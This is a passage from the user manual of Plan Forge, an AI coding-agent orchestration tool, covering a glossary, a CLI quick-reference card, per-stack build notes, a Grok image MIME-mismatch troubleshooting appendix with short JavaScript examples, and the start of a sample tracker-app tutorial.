Plan Hardener	Step 2 agent/runbook that converts a draft plan into a Hardened Plan by adding scope contract, validation gates, forbidden actions, and rollback. Lives at `.github/prompts/step2-harden-plan.prompt.md`.
Reviewer Gate	Step 5 agent persona that runs in a fresh session, reads the plan's Scope Contract, and audits the diff for drift and quality. Distinct from LiveGuard (runtime layer). Can be delegated to GitHub Copilot cloud agent via `forge_delegate_review`.
Shipper	Step 6 agent persona for commit, push, deploy, and close. Lives at `.github/agents/shipper.agent.md`.
Runbook (tool)	The `forge_runbook` MCP tool that exposes the AI Plan Hardening Runbook as a callable surface; agents can request the canonical step list, gate templates, and prompt URIs without re-reading the Markdown source.
Runbook	Bare term; in Plan Forge it always refers to the AI Plan Hardening Runbook (the document) or the `forge_runbook` tool that exposes it. See both entries for specifics.
applyTo	Frontmatter field in instruction files that controls which files trigger auto-loading. Uses glob patterns (e.g., `*` for all files, `.cs` for C# only).

Execution

Term	Definition
Full Auto	Mode where `gh copilot` CLI runs each slice automatically. No human intervention.
Assisted	Mode where human codes in VS Code; orchestrator validates gates between slices.
Worker	The CLI process executing a slice: gh copilot, claude, or codex.
DAG	Directed Acyclic Graph: the dependency graph of slices determining execution order.
[P] tag	Parallel-safe marker on a slice header. Enables concurrent execution.
[depends: Slice N]	Dependency marker. Slice waits for N to complete before starting.
Quorum Mode	Multi-model consensus on slice execution: 3+ models analyze a slice independently, reviewer synthesizes best approach. Auto-winner. CLI: `--quorum=auto/power/speed/false`.
Quorum Auto	Threshold-based: only slices scoring above the complexity threshold use quorum.
Quorum Power	Multi-model consensus using flagship models (highest quality, highest cost). Complexity threshold 5. CLI: `--quorum=power`.
Quorum Speed	Multi-model consensus using fast models (lower quality, lower cost). Complexity threshold 7. CLI: `--quorum=speed`.
Quorum Advisory	Multi-model consensus on Forge-Master prompts (not slices). Returns all replies + dissent summary; human picks the reply. Configured via `forgeMaster.quorumAdvisory: "off" | "auto" | "always"`. Hard-blocked on operational, troubleshoot, build lanes.
Complexity Score	1–10 rating based on file scope, dependencies, security keywords, gate count, historical failure rate.
Escalation Chain	Model failover order: if Model A fails, try B, then C.
Forge-Master	Read-only reasoning orchestrator with three-stage intent classifier (keyword → embedding cache → router LLM). Lives at `forge_master_ask` + Studio dashboard tab. Phase-28 MVP, subsequently expanded with quorum advisory and unified timeline.
Forge-Master Observer	Background hub subscriber (`pforge-master/src/observer-loop.mjs`) that batches live Plan Forge events and narrates notable patterns in plain prose via the reasoning loop. Mute-by-default: enable with `forgeMaster.observer.enabled: true`. Budget-capped via `maxUsdPerDay` and `maxNarrationsPerHour`. Started with `pforge master observe --start [--detach]` or the `forge_master_observe` MCP tool.
Cross-Run Watcher	Watcher mode (`runWatch({ mode: "cross-run" })`) that aggregates `.forge/runs/*/summary.json` across multiple completed runs into a health snapshot. Detects recurring gate failures, retry-rate spikes, cost anomaly trends, and slice-timeout clusters. Feeds the A4 plan-health auditor agent when triggered by `hooks.postRun.invokeAuditor`.
Auditor Auto-Invoke	PostRun hook behavior (`hooks.postRun.invokeAuditor`) that automatically triggers the A4 plan-health auditor on run failure (`onFailure: true`) or every N completed runs (`everyNRuns: N`). The auditor report is written to `.forge/health/latest.md`. See forge-json-reference § hooks.postRun.
Embedding Cache	Stage 1.5 of the Forge-Master intent classifier. Cosine-similarity match (≥ 0.85) against previously-classified prompts. Zero API cost on hit, works fully offline once warm. 500-entry LRU.
CRITICAL_FIELDS	The six fields the Crucible critical-fields gate requires before finalizing: build-command, test-command, scope, validation-gates, forbidden-actions, rollback. Added v2.82.1.
Host-Aware Routing	Routing preference that detects the IDE/CLI host (VS Code, Claude Code, Cursor, Windsurf, Zed, CLI) and chooses CLI proxy vs direct API to honor whichever subscription the user is paying for. Modes: `auto / gh-copilot / direct-api / drop`.
DIRECT_API_ONLY	Routing class for models with no CLI proxy: `grok-`, `dall-e-`. Always require an API key (XAI_API_KEY / OPENAI_API_KEY).
COPILOT_SERVABLE	Routing class for `gpt-` / `chatgpt-` models. `gh-copilot` can proxy them via your Copilot subscription; direct API is fallback if `OPENAI_API_KEY` is set.
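
The DAG, `[P]`, and `[depends: Slice N]` entries above combine into a scheduling problem: group slices into waves where every dependency has already finished. The sketch below shows one way to do that with Kahn-style topological layering. The header format, the use of multiple `[depends: …]` markers on one header, and the `parseSlices` / `executionWaves` helpers are assumptions for illustration, not the orchestrator's parser.

```javascript
// Parse hypothetical slice headers into { id, deps, parallelSafe } records.
function parseSlices(headers) {
  return headers.map((header) => {
    const idMatch = /Slice (\d+)/.exec(header);
    if (!idMatch) throw new Error(`Not a slice header: ${header}`);
    const deps = [...header.matchAll(/\[depends: Slice (\d+)\]/g)].map((m) => Number(m[1]));
    return { id: Number(idMatch[1]), deps, parallelSafe: header.includes("[P]") };
  });
}

// Group slices into waves; every slice in a wave has all dependencies
// satisfied by earlier waves.
function executionWaves(slices) {
  const remaining = new Map(slices.map((s) => [s.id, new Set(s.deps)]));
  const waves = [];
  while (remaining.size > 0) {
    const ready = [...remaining.keys()]
      .filter((id) => remaining.get(id).size === 0)
      .sort((a, b) => a - b);
    // Nothing ready means a cycle (or a dependency on a slice that does not exist).
    if (ready.length === 0) throw new Error("Unresolvable dependencies: not a DAG");
    waves.push(ready);
    for (const id of ready) remaining.delete(id);
    for (const deps of remaining.values()) {
      for (const id of ready) deps.delete(id);
    }
  }
  return waves;
}

const parsed = parseSlices([
  "Slice 1: Schema migration",
  "Slice 2: Repository layer [P] [depends: Slice 1]",
  "Slice 3: API handlers [P] [depends: Slice 1]",
  "Slice 4: Integration tests [depends: Slice 2] [depends: Slice 3]",
]);
const waves = executionWaves(parsed);
console.log(JSON.stringify(waves));
```

Here slices 2 and 3 land in the same wave, which is where a parallel-safe marker would allow concurrent execution.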

Components

Term	Definition
Smith	Diagnostic tool (`pforge smith`). Inspects environment, setup, version. Named after a blacksmith.
Sweep	Completeness scan (`pforge sweep`). Finds TODO/FIXME/stub markers.
Analyze	Consistency scoring (`pforge analyze`). Scores 0–100 across 4 dimensions.
Orchestrator	Execution engine. Parses plans, schedules slices, spawns workers, validates gates.
Hub	WebSocket event server. Broadcasts slice events to connected clients in real-time.
Dashboard	Web UI at `localhost:3100/dashboard`. 25 tabs for monitoring, cost, replay, skills, config, watcher, and LiveGuard.
Lifecycle Hook	Automatic actions tied to Plan Forge's pipeline: `PreDeploy`, `PreCommit`, `PreAgentHandoff`, `PostSlice` (configured via `.github/hooks/plan-forge.json`). Distinct from Claude Code's own hook names.
OpenBrain	The L3 memory layer. Self-hosted MCP server (PostgreSQL + pgvector) that provides cross-session, cross-tool semantic memory. Plan Forge ships with L1 (Hub) + L2 (`.forge/*.jsonl`) memory built-in; L3 requires OpenBrain. Without it, Reflexion lessons, Auto-skills, cross-project Federation, and 28 auto-capturing tools become inert. Recommended at install time; easy to add later via `pforge brain hint`. Deploy options: Docker, Supabase, Kubernetes, Azure. See srnichols.github.io/OpenBrain.
MCP	Model Context Protocol. A standard for AI agents to call functions. Plan Forge's MCP server exposes 102 tools (core + LiveGuard + Watcher + Crucible + Tempering + Bug Registry + Testbed + Forge-Master).
ACI	Agent-Computer Interface. The SWE-agent principle that an agent only performs as well as the surface lets it: bounded payloads, sparse fields, paginated lists, friendly empty-result messages. Enforced in Plan Forge via tool-surface temper guards in `architecture-principles.instructions.md`. `forge_search` is the reference standard.
Bridge	Notification dispatcher that forwards WebSocket hub events to external platforms (Slack, Discord, Telegram, generic webhooks).
Knowledge Graph	In-memory graph of Phase / Slice / Commit / File / Run / Bug nodes, queryable via `forge_graph_query`. Used by Forge-Master for cross-feature reasoning. See Chapter 28.
Cost Ledger	Aggregated token + dollar history across runs (`.forge/cost-history.json`). Powers `forge_cost_report`, anomaly detection, and the cost dashboard tab.
Worktree	Git worktree feature used by Plan Forge so multiple developers can run plans on the same repo without colliding. Each worktree gets its own `.forge/` directory and a row in the shared team-activity ledger.
Discovery Harness	4-pass build sequence (Harness → Wrapper → Execute → Auto-smelt) that crawls a running app, converts findings to Crucible smelts, runs slices with Tempering, and re-smelts failures into new bugs.
Spec Kit Interop	Bridge that imports GitHub Spec Kit projects via `forge_crucible_import` using deterministic field mapping (no LLM call). Spec Kit specs become Crucible smelts.
Foundry	Microsoft Foundry, the external Azure-hosted agent platform Plan Forge integrates with. Provides Foundry Toolboxes (MCP-compatible tool bundles), Foundry Agent Service (hosted agent runtime), and Foundry App Insights (OTel sink). See `foundry-quota.mjs` and the `microsoft-foundry` skill.
Lattice	v2.95 code-graph engine. Semantic chunk index plus BFS call-graph traversal for any git repository. Produces `.forge/lattice/chunks.jsonl` and `edges.jsonl`. Pure-JS chunker with optional tree-sitter upgrade. Five MCP tools: `index / stat / query / callers / blast`. CLI: `pforge lattice`.
Anvil	Δ-only memoization layer for the Lattice. Caches expensive analyses (chunk extraction, embedding lookups, gate replays) keyed by content hash; only recomputes the delta when source changes. CLI: `pforge anvil stat / purge`. Hit rate is reported by `forge_lattice_stat`.
Triage	Plan Forge's noise-vs-signal classifier surface. Two tools: `forge_alert_triage` (groups and prioritizes open LiveGuard alerts) and `forge_triage_route` (routes a finding to a lane: real-bug, flaky, noise, or human-review). CLI: `pforge triage`.
Timeline	Chronological event view exposed via `forge_timeline`; it merges run events, gate results, commits, and incidents on a single axis for the current phase or slice.
Home Snapshot	Bounded activity overview returned by `forge_home_snapshot`. Pagination-friendly summary of recent runs, open bugs, drift score, and active plans; the default landing payload for Forge-Master and the Studio home tab.
Image Generation	Image synthesis surface (`forge_generate_image`) that proxies DALL-E / image models for chapter heroes, diagrams, and marketing assets. `DIRECT_API_ONLY`: requires `OPENAI_API_KEY`.
GitHub Metrics	Subsystem (`github-metrics.mjs`) that ingests PR / issue / commit metrics from the GitHub REST API and feeds them into Health DNA and Forge Intelligence. Paired with `github-introspect.mjs` for repo-shape introspection.
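
The Lattice entry mentions BFS call-graph traversal behind its `callers` and `blast` tools. As a rough sketch of that technique, the function below walks caller edges breadth-first from a target symbol and records the hop distance of each transitive caller. The edge shape (`from` calls `to`) and the `blastRadius` helper are assumptions; the actual `edges.jsonl` format is not described here.

```javascript
// Breadth-first walk over reverse call edges: who (transitively) calls `target`?
function blastRadius(edges, target, maxDepth = Infinity) {
  // Index callers by callee so each lookup is O(1).
  const callersOf = new Map();
  for (const { from, to } of edges) {
    if (!callersOf.has(to)) callersOf.set(to, []);
    callersOf.get(to).push(from);
  }
  const depth = new Map([[target, 0]]);
  const queue = [target];
  while (queue.length > 0) {
    const current = queue.shift();
    const hops = depth.get(current);
    if (hops >= maxDepth) continue;
    for (const caller of callersOf.get(current) ?? []) {
      if (depth.has(caller)) continue; // already reached by a shorter or equal path
      depth.set(caller, hops + 1);
      queue.push(caller);
    }
  }
  depth.delete(target);
  return [...depth.entries()].map(([symbol, hops]) => ({ symbol, hops }));
}

// Hypothetical call edges: `from` calls `to`.
const callEdges = [
  { from: "api.createOrder", to: "service.placeOrder" },
  { from: "cli.importOrders", to: "service.placeOrder" },
  { from: "service.placeOrder", to: "repo.save" },
  { from: "repo.save", to: "db.query" },
];
const impacted = blastRadius(callEdges, "repo.save");
console.log(impacted);
```

Changing `repo.save` in this sample reaches `service.placeOrder` at one hop and both entry points at two hops; `db.query` is downstream and therefore not part of the blast radius.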

The Loops

Plan Forge names four loops: the outer Self-Deterministic Agent Loop and three loops nested inside it. Each loop has its own canonical chapter; the entries below are the one-line cards.

Term	Definition
Inner Loop	The slice-level reasoning loop composed of the ten inner-loop subsystems (reflexion, trajectories, auto-skills, gate synthesis, postmortems, federation, reviewer, competitive execution, auto-fix, cost anomaly). Wraps every slice attempt. See Inner Loop deep dive.
Competitive Loop	Multi-model race pattern within slice execution. Two or more workers attempt the same slice in parallel; the orchestrator validates each and ships the winner. See Competitive Loop deep dive.
Audit Loop	Closed-loop bug discovery from a running system. Content-audit scanner → triage → drain cycle iterates until convergence. Default `off`; opt-in via `.forge.json#audit.mode`. Production environments hard-blocked. See Audit Loop deep dive.
Self-Deterministic Loop	Alias for Self-Deterministic Agent Loop. The system-wide outer loop that wraps the deterministic slice executor with all inner-loop subsystems.

Inner Loop Subsystems

The ten opt-in subsystems that compose the Inner Loop. Each is independently configurable; the Reviewer subsystem reuses the Step 5 Reviewer Gate agent persona (see Pipeline).

Term	Definition
Reflexion	Re-analyzes a failed slice attempt to extract a lesson learned; the lesson is persisted to memory and injected into the next attempt's context.
Trajectory	Captured record of a slice attempt (prompts, tool calls, gates passed/failed, model used, duration). Stored in `.forge/trajectories/`. The Inner Loop replays trajectories to learn from past runs.
Auto-skill	Auto-promotes a successful prompt pattern into a reusable Skill after 3+ uses. Generated skill lands at `.github/skills/<name>/SKILL.md` for human review.
Gate Synthesis	Proposes new validation gates based on observed slice failures. If three runs of the same plan fail at the same regression, Gate Synthesis suggests a gate that would have caught it.
Postmortem	Auto-generated retrospective after a failed run, written to `.forge/postmortems/`. Includes timeline, root cause hypothesis, and a fix proposal.
Federation	Cross-project intelligence sharing via OpenBrain. One project's lesson learned becomes another project's preflight check or postmortem hint.
Competitive Execution	Inner-loop flavor of the Competitive Loop: two models race on the same slice, and the first valid result wins. Cost-bounded by escalation chain policy.
Auto-fix	Proposes a 1–2 slice fix plan when a gate fails. Stored in `docs/plans/auto/`. Distinct from LiveGuard's Fix Proposal (which fires on post-deploy drift, not slice-time gate failure).
Cost Anomaly	Flags slices whose token cost is >2σ above their historical baseline. Triggers escalation chain review or quorum threshold adjustment.
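
The Cost Anomaly rule (">2σ above historical baseline") can be sketched as follows. This is a minimal illustration, not Plan Forge's implementation: the function name `isCostAnomaly`, the use of population standard deviation, and the "at least two samples" guard are all assumptions.

```javascript
// Hypothetical helper (not part of Plan Forge): flags a slice whose token
// cost is more than `sigmas` standard deviations above its historical mean.
function isCostAnomaly(history, currentCost, sigmas = 2) {
  // Assumption: with fewer than two samples there is no usable baseline.
  if (history.length < 2) return false;
  const mean = history.reduce((sum, c) => sum + c, 0) / history.length;
  // Population variance; a sample variance (n - 1) would work equally well.
  const variance =
    history.reduce((sum, c) => sum + (c - mean) ** 2, 0) / history.length;
  const stdDev = Math.sqrt(variance);
  return currentCost > mean + sigmas * stdDev;
}
```

With a history of `[100, 110, 90, 105, 95]` the mean is 100 and the standard deviation is about 7.07, so the threshold sits near 114: a cost of 120 is flagged and a cost of 112 is not.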

LiveGuard

Term	Definition
Drift Score	Numeric score (0–100) measuring how closely code follows architecture guardrails. Lower = more violations.
Fix Proposal	Auto-generated 1–2 slice plan from LiveGuard findings. Stored in `docs/plans/auto/`.
LiveGuard	Post-coding operational intelligence layer. 14 MCP tools for drift, incidents, deploys, secrets, dependencies, and composite health checks.
MTTR	Mean Time To Resolve. Computed from incident capture to `resolvedAt` timestamp.
Secret Scan	Entropy-based scan of recent commits for potential hardcoded credentials.
OpenClaw	Optional external analytics service. Receives LiveGuard snapshots via POST for cross-project health monitoring.
Health DNA	Composite project health fingerprint: drift avg, incident rate, test pass rate, model success rate, cost per slice. Persisted to `.forge/health-dna.json`. Used for cross-session decay detection.
Forge Intelligence	Build-time self-improvement: auto-tuning escalation chains, cost calibration, adaptive quorum thresholds, slice splitting advisories. The forge gets smarter every run.
Recurring Incident	When 3+ incidents hit the same files in 30 days, LiveGuard auto-escalates severity and marks the pattern as systemic.
Deploy Journal	Append-only deploy history exposed via `forge_deploy_journal`. Each entry records environment, commit, slice range, gates passed, and outcome. It is the source of truth for "what shipped when" and the basis for rollback decisions.
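
The Recurring Incident rule (3+ incidents hitting the same files in 30 days) could be approximated like this. It is a sketch under stated assumptions: the incident shape `{ files, capturedAt }`, the function name `findRecurringFiles`, and counting per individual file are illustrative choices, not LiveGuard's documented behavior.

```javascript
// Assumed incident shape: { files: string[], capturedAt: ISO-8601 string }.
const WINDOW_MS = 30 * 24 * 60 * 60 * 1000; // 30 days in milliseconds

// Returns the files touched by at least `minCount` incidents in the window.
function findRecurringFiles(incidents, now, minCount = 3) {
  const counts = new Map();
  for (const incident of incidents) {
    const age = now.getTime() - new Date(incident.capturedAt).getTime();
    if (age < 0 || age > WINDOW_MS) continue; // outside the 30-day window
    // De-duplicate so one incident counts a given file only once.
    for (const file of new Set(incident.files)) {
      counts.set(file, (counts.get(file) ?? 0) + 1);
    }
  }
  return [...counts].filter(([, n]) => n >= minCount).map(([file]) => file);
}
```

A caller would then escalate severity for any incident touching a returned file.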

Worker Guardrails

Term	Definition
PreCommit Chain	Ordered list of validation scripts declared in `hooks.preCommit.chain[]` that run before every slice commit.
Diff Classifier	The `forge_diff_classify` MCP tool that scans staged git diffs for security and quality issues.
Plan Lock Hash	SHA-256 hash stored in `lockHash` frontmatter; the orchestrator refuses to run if the plan body has drifted.
Tool Denylist	The `tools.deny` frontmatter field that strips listed MCP tools from the worker's session.
Network Allowlist	The `network.allowed` frontmatter field listing permitted hosts for outbound connections (currently log-only).
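
To make the Tool Denylist concrete, here is a minimal sketch of stripping denied tools from a worker's tool list. It assumes the plan frontmatter has already been parsed into an object; `filterTools` is a hypothetical name, and the real orchestrator may apply the denylist differently.

```javascript
// Hypothetical helper: `frontmatter` is the already-parsed plan frontmatter,
// e.g. { tools: { deny: ["forge_generate_image"] } }.
function filterTools(availableTools, frontmatter) {
  // A missing `tools.deny` field is treated as an empty denylist.
  const denied = new Set(frontmatter?.tools?.deny ?? []);
  return availableTools.filter((name) => !denied.has(name));
}
```

For example, denying `forge_generate_image` leaves every other tool available to the worker, and a plan with no `tools.deny` field leaves the list unchanged.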

Data Structures

Term	Definition
Run	A single plan execution. Creates `.forge/runs/<timestamp>/` with results and traces.
Trace	OTLP-compatible JSON recording the full execution with spans, events, and timing.
OTLP	OpenTelemetry Protocol, the standard format for distributed traces. Plan Forge traces are OTLP-compatible and can be exported to Jaeger, Grafana Tempo, or any collector.
Span	A timed unit within a trace: run (root), slice (child), gate (grandchild).
Cost History	`.forge/cost-history.json`: aggregate token/cost data across all runs.
Index	`.forge/runs/index.jsonl`: append-only run registry for instant lookup.
SARIF	Static Analysis Results Interchange Format, the OASIS standard JSON schema CI scanners (CodeQL, Semgrep, ESLint, etc.) emit. Plan Forge converts SARIF files into hardenable plans via `sarif-to-plan.mjs`, turning third-party findings into Crucible smelts.
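
An append-only JSONL registry such as the Index holds one JSON object per line, so reading it is a split-and-parse. The sketch below works on text already loaded from the file; the `id` and `status` fields in the usage note are illustrative assumptions, not the real index schema.

```javascript
// Parses JSONL text: one JSON object per non-empty line.
function parseJsonl(text) {
  return text
    .split("\n")
    .map((line) => line.trim())
    .filter((line) => line.length > 0)
    .map((line) => JSON.parse(line));
}

// Because the file is append-only, the newest entry is the last line.
function latestRun(text) {
  const runs = parseJsonl(text);
  return runs.length > 0 ? runs[runs.length - 1] : null;
}
```

Given two lines with hypothetical ids `run-1` and `run-2`, `latestRun` returns the `run-2` entry; an empty file yields `null`.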

Appendix B

Quick Reference Card

Printable cheat sheet. Ctrl+P for a clean print.

CLI Commands

Command	Description
`pforge init`	Bootstrap project with setup wizard
`pforge check`	Validate setup files
`pforge smith`	Diagnose environment + setup health
`pforge status`	Show phase status from roadmap
`pforge new-phase <name>`	Create new phase plan + roadmap entry
`pforge branch <plan>`	Create git branch from plan
`pforge commit <plan> <slice>`	Auto-generate conventional commit
`pforge phase-status <plan> <status>`	Update phase status in roadmap
`pforge sweep`	Scan for TODO/FIXME markers
`pforge diff <plan>`	Compare changes vs scope contract
`pforge analyze <plan>`	Consistency scoring (0–100)
`forge_diagnose({ file })` (MCP tool)	Multi-model bug investigation
`pforge run-plan <plan>`	Execute plan (auto/assisted/estimate)
`pforge audit-loop [--auto]`	Run closed-loop drain. Off by default; opt-in via `.forge.json#audit`.
`pforge timeline [--source X --window 24h]`	Unified chronological view across 9 sources
`pforge ext search\|add\|list\|remove`	Extension management
`pforge update`	Update framework files
`pforge help`	Show all commands
`pforge tour`	Interactive guided walkthrough

LiveGuard Commands

Command	Description
`pforge drift`	Score codebase against guardrails
`pforge incident <desc>`	Capture an incident
`pforge triage`	Rank open alerts
`pforge dep-watch`	Scan dependency vulnerabilities
`pforge secret-scan`	Scan for hardcoded secrets
`pforge health-trend`	Health score over time

Pipeline Steps

Step	Name	Session	Agent
0	Specify	1	specifier
1	Pre-flight	1	—
2	Harden	1	plan-hardener
3	Execute	2	executor
4	Sweep	2	—
5	Review	3	reviewer-gate
6	Ship	4	shipper

Key Files

File	Purpose
`.forge.json`	Project config (preset, models, escalation, quorum)
`.github/copilot-instructions.md`	Master config, loads every session
`.github/instructions/*.instructions.md`	Auto-loading guardrails (15–18 files)
`.github/agents/*.agent.md`	Reviewer agents (19 total)
`.github/prompts/step*.prompt.md`	Pipeline prompt templates
`.github/skills/*/SKILL.md`	Slash command skills (13 total)
`.github/hooks/`	Lifecycle hooks (4 files)
`docs/plans/DEPLOYMENT-ROADMAP.md`	Phase tracker
`docs/plans/PROJECT-PRINCIPLES.md`	Non-negotiable commitments
`.forge/runs/`	Execution history, traces, logs
`.forge/cost-history.json`	Aggregate cost data

Ports & URLs

Port	URL	Purpose
3100	`localhost:3100/dashboard`	Dashboard UI + REST API
3100	`localhost:3100/ui`	Read-only plan browser
3101	`ws://localhost:3101`	WebSocket real-time events

Key Flags

Flag	Command	Effect
`--estimate`	run-plan	Cost prediction only
`--assisted`	run-plan	Human codes, orchestrator validates
`--resume-from N`	run-plan	Skip completed slices
`--quorum`	run-plan	Multi-model consensus
`--dry-run`	most commands	Preview without executing
`-Agent all`	init/setup	Generate files for all AI tools

Appendix C

Stack-Specific Notes

Per-preset differences at a glance.

All presets share 4 universal instruction files, 8 cross-stack agents, and 6 pipeline agents. This appendix shows what's different per preset.

.NET (`dotnet`)

Property	Value
Build	`dotnet build`
Test	`dotnet test`
Framework	ASP.NET Core, Blazor, Dapper/EF Core
Testing	xUnit, NSubstitute, FluentAssertions
Unique files	`graphql.instructions.md`, `dapr.instructions.md`
Example plan	`Phase-DOTNET-EXAMPLE.md`
Detection	`.csproj` or `.sln` in root

TypeScript (`typescript`)

Property	Value
Build	`npm run build` / `tsc`
Test	`npm test` / `vitest`
Framework	Express, Fastify, Next.js
Testing	Vitest, Jest, Supertest
Unique files	`frontend.instructions.md` (React/Vue patterns)
Example plan	`Phase-TYPESCRIPT-EXAMPLE.md`
Detection	`tsconfig.json` or `package.json` in root

Python (`python`)

Property	Value
Build	`python -m py_compile`
Test	`pytest`
Framework	FastAPI, Django, Flask
Testing	Pytest, pytest-asyncio, httpx
Unique files	—
Example plan	`Phase-PYTHON-EXAMPLE.md`
Detection	`requirements.txt`, `pyproject.toml`, or `setup.py`

Java (`java`)

Property	Value
Build	`mvn compile` / `gradle build`
Test	`mvn test` / `gradle test`
Framework	Spring Boot, JPA, Hibernate
Testing	JUnit 5, Mockito, AssertJ
Unique files	—
Example plan	`Phase-JAVA-EXAMPLE.md`
Detection	`pom.xml` or `build.gradle`

Go (`go`)

Property	Value
Build	`go build ./...`
Test	`go test ./...`
Framework	Standard library, Chi router, Cobra CLI
Testing	testing package, testify
Unique files	—
Example plan	`Phase-GO-EXAMPLE.md`
Detection	`go.mod` in root

Swift (`swift`)

Property	Value
Build	`swift build` / `xcodebuild`
Test	`swift test`
Framework	SwiftUI, Vapor, Fluent
Testing	XCTest
Unique files	—
Example plan	`Phase-SWIFT-EXAMPLE.md`
Detection	`Package.swift` or `*.xcodeproj`

Rust (`rust`)

Property	Value
Build	`cargo build`
Test	`cargo test`
Framework	Tokio, Axum, sqlx
Testing	Cargo test, proptest
Unique files	—
Example plan	`Phase-RUST-EXAMPLE.md`
Detection	`Cargo.toml` in root

PHP (`php`)

Property	Value
Build	`composer install`
Test	`php artisan test` / `phpunit`
Framework	Laravel, Eloquent
Testing	PHPUnit, Pest
Unique files	—
Example plan	`Phase-PHP-EXAMPLE.md`
Detection	`composer.json` in root

Azure IaC (`azure-iac`)

Property	Value
Build	`az bicep build` / `terraform validate`
Test	`az deployment group what-if` / `terraform plan`
Framework	Bicep, Terraform, Azure CLI, azd
Testing	what-if / plan validation, Pester for PowerShell
Unique files	Replaces app-specific agents with: bicep-reviewer, terraform-reviewer, deploy-helper, azure-sweeper
Example plan	—
Detection	`.bicep`, `.tf`, or `azure.yaml` in root

Appendix D

Grok Image Generation Warnings

xAI Aurora MIME mismatch: root cause, impact, mitigations, and safe workflows.

KNOWN ISSUE: xAI Grok Aurora returns JPEG bytes regardless of requested format. If mismatched bytes enter a Claude conversation history, the session becomes unrecoverable. Current code mitigates this; read on for safe workflows.

The Problem

The xAI Grok image generation API (Aurora) returns JPEG bytes regardless of the format you request. When these bytes are passed through MCP tool results with a declared media_type: "image/png", the Claude API rejects the request:

Error message

invalid_request_error: The image was specified using the image/png media type,
but the image appears to be a image/jpeg image

Why Sessions Lock Up

The image tool generates an image, and the bytes land in the MCP tool result
If raw base64 is included in the response, Claude adds it to conversation history
Claude's API validates MIME types on every subsequent request (the entire message history is re-sent)
Once a mismatched image enters the history, every future message fails with the same 400 error
The session cannot be recovered; you must start a new conversation

This only affects conversations where raw base64 image data enters the message history. The current Plan Forge MCP implementation returns text-only responses (file path + metadata), so this crash should not occur during normal use.

Current Mitigations

The generateImage() function in orchestrator.mjs has four layers of defense:

Defense	What It Does	Code Location
Magic byte detection	Inspects first bytes to determine actual format (JPEG = `0xFF 0xD8 0xFF`, PNG = `0x89 0x50 0x4E 0x47`)	`detectImageFormat()`
Format conversion	Uses `sharp` to convert to requested format when actual ≠ requested	`convertImageFormat()`
Text-only MCP response	Tool returns `type: "text"` with JSON payload (file path, metadata), never raw base64	`server.mjs` handler
Truncated base64	Only first 100 chars of base64 included for diagnostics, never full bytes	`generateImage()` return
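
The magic byte check in the first row can be illustrated with a short sketch. It uses the two signatures listed in the table; `sniffImageFormat` and `mimeTypeFor` are hypothetical names, and the real `detectImageFormat()` in `orchestrator.mjs` may differ in signature and return values.

```javascript
// Hypothetical stand-in for the detection step: inspects the leading bytes
// of a Uint8Array (or Node Buffer) and names the actual image format.
function sniffImageFormat(bytes) {
  // True when `bytes` begins with every byte of the signature, in order.
  const startsWith = (sig) => sig.every((b, i) => bytes[i] === b);
  if (startsWith([0xff, 0xd8, 0xff])) return "jpeg";
  if (startsWith([0x89, 0x50, 0x4e, 0x47])) return "png";
  return "unknown";
}

// Maps the detected format to the media type that should be declared.
function mimeTypeFor(bytes) {
  const format = sniffImageFormat(bytes);
  return format === "unknown" ? null : `image/${format}`;
}
```

Comparing `mimeTypeFor(bytes)` against the requested media type before anything is returned is what catches the JPEG-labeled-as-PNG case described above.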

Safe Workflows

For Chapter Art and Illustrations

Always specify outputPath so the image saves to disk instead of being returned inline
Prefer the .jpg extension: it matches what Grok actually returns, so no conversion is needed
If you need PNG, ensure sharp is installed: cd pforge-mcp && npm install sharp
Never generate images in a long-running session; use the REST API or a standalone script
Batch image generation: generate all art in one dedicated session, separate from writing

Standalone Script (Recommended)

REST API (server must be running)

curl -X POST http://localhost:3100/api/image/generate \
  -H "Content-Type: application/json" \
  -d '{
    "prompt": "dark fantasy forge workshop panoramic, amber firelight",
    "outputPath": "docs/manual/assets/chapter-heroes/ch1-hero.webp"
  }'

One-shot Node script (no server needed)

node -e "
  import('./pforge-mcp/orchestrator.mjs').then(m =>
    m.generateImage('dark fantasy forge workshop, amber firelight', {
      outputPath: 'docs/manual/assets/chapter-heroes/ch1-hero.webp',
      model: 'grok-imagine-image'
    }).then(r => console.log(JSON.stringify(r, null, 2)))
  )
"

Pipeline Test Results

Tested 2026-04-07:

Test	Result	Details
JPG direct (`.jpg` output)	✓ PASS	Grok returns JPEG, saved as `.jpg`, no conversion. 41 KB.
PNG conversion (`.png` output)	✓ PASS	Grok returns JPEG, `sharp` converts to PNG, 312 KB.
MIME detection	✓ PASS	`detectImageFormat()` correctly identified JPEG bytes.
MCP tool response	✓ SAFE	Returns text-only JSON, never raw base64.
Session recovery	⚠ MITIGATED	Crash only occurs if raw base64 with wrong MIME enters history. Current code prevents this.

If a Session Crashes

Start a new conversation; the current session cannot be recovered
Don't retry the same tool call in the new session; it will produce the same crash if the root cause persists
Use the REST API instead of the MCP tool for image generation
Check sharp: run cd pforge-mcp && npm ls sharp. If it is not installed, format conversion won't work and the extension gets corrected to .jpg instead

Best practice: Use .jpg for all generated images. It matches Grok's native output format, so there is no conversion, no risk, and the fastest save.

📄 Source: pforge-mcp/orchestrator.mjs, detectImageFormat(), convertImageFormat(), generateImage()

Appendix E

Sample Project — Build a Tracker App

Pick your stack. Build a real app. Learn Plan Forge by using it.

The Tracker App

A task tracker with users, projects, tasks, statuses, and comments. Simple enough to build in an afternoon, rich enough to exercise every Plan Forge feature. You'll run the full pipeline (Specify → Harden → Execute → Review → Ship) five times, once per phase, and learn a different manual chapter with each one.

Tracker App: Data Model

Entity	Fields
Users	id, email, name, password_hash, role, created_at
Projects	id, name, description, owner_id, status, created_at
Tasks	id, project_id, title, description, status, assignee_id, priority, due_date
Comments	id, task_id, author_id, body, created_at

Pick Your Preset

The specs below are framework-agnostic. Plan Forge generates stack-specific plans based on your preset. Pick the one you want to learn:

dotnet, typescript, python, java, go, swift, rust, php, any stack

Getting Started

Terminal

mkdir tracker-app && cd tracker-app
git init

# Pick your preset (replace <your-stack> with dotnet, typescript, python, etc.)
.\setup.ps1 -Preset <your-stack>

# Verify
.\pforge.ps1 smith

Phase Roadmap

Phase 1: Bootstrap + Health → Phase 2: Users + Auth → Phase 3: Projects + Tasks → Phase 4: Comments + Events → Phase 5: Dashboard + Reports

What You'll Practice

Phase	What You Build	Manual Chapters Practiced
1	Project scaffold + `GET /health`	Ch 3 (Installation), Ch 4 (Your First Plan)
2	User model + JWT auth + roles	Ch 5 (Writing Plans), Ch 9 (auto-loading auth + security instructions)
3	Project & Task CRUD + tests	Ch 6 (Dashboard monitoring), Ch 7 (CLI: sweep, diff, analyze)
